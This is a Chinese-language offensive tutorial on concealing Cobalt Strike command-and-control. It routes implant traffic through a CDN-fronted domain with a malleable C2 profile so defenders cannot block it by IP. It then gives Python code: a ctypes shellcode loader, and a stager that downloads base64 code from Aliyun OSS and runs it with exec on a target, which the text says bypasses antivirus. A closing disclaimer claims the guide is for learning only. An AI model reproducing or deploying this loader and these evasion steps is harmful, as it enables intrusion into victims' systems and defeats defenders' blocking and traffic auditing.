防朔源拉黑-CDN节点

1.购买一个域名,开启开启cdn

2.全球ping一下域名,可以看到cdn生效


3.根据自己cs版本修改对应c2项目文件

下载:

https://github.com/threatexpress/malleable-c2

打开文件搜索http-get,将如下图修改为设置cdn的域名


搜索http-post,将如下图修改为设置cdn的域名


4.将该文件上传到服务端cs目录下


5.服务端启动cs时,执行命令:./teamserver ip 密码 jquery-c2.4.3.profile

6.启动客户端cs连接,创建监听器。将下图位置填写为设置cdn的域名。


7.如此防溯源拉黑操作就完成了

当设置木马远程连接的地址是本机真实ip时,对方可以使用流量监测工具看到网络外联,当其拉黑ip后我们便不能正常通信了。
        配置cdn,让木马远程连接的地址是我们域名上配置的cdn节点,就算拉黑某个cdn节点的ip,其他的cdn节点ip也会顶替上来,还是能够正常通信。

防流量审计-OSS存储-上线

1.阿里云配置OSS对象存储

2.将如下加载代码替换shellcode后进行base64编码

加载器代码:

import ctypes

shellcode=b'你的shellcode'

ctypes.windll.kernel32.VirtualAlloc.restype=ctypes.c_uint64

rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)

ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(rwxpage), ctypes.create_string_buffer(shellcode), len(shellcode))

handle = ctypes.windll.kernel32.CreateThread(0, 0,ctypes.c_uint64(rwxpage), 0, 0, 0)

ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

编码:

编码成功保存到txt文件中

3.将txt文件上传到阿里云oss,上传成功点击分享,获取访问链接


4.将访问链接写入如下python加载代码

代码:http.py

import ctypes,base64

from urllib.request import urlopen

url=urlopen("访问链接")

z=url.read()

zx=base64.b64decode(z)

exec(zx)

5.将http.py上传到目标系统,使用python执行即可上线(也可以打包成exe程序上传)。

绕过检测

成功上线


6.为什么使用OSS?

在做shellcode分离时,如果从一个不受信任的url加载shellcode,可能会被杀软检测拦截。
使用阿里云的OSS存储,加载shellcode文件,那么url是阿里云的,是绿标网站,就会被杀软放行。

免责声明

本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本平台和发布者不为此承担任何责任。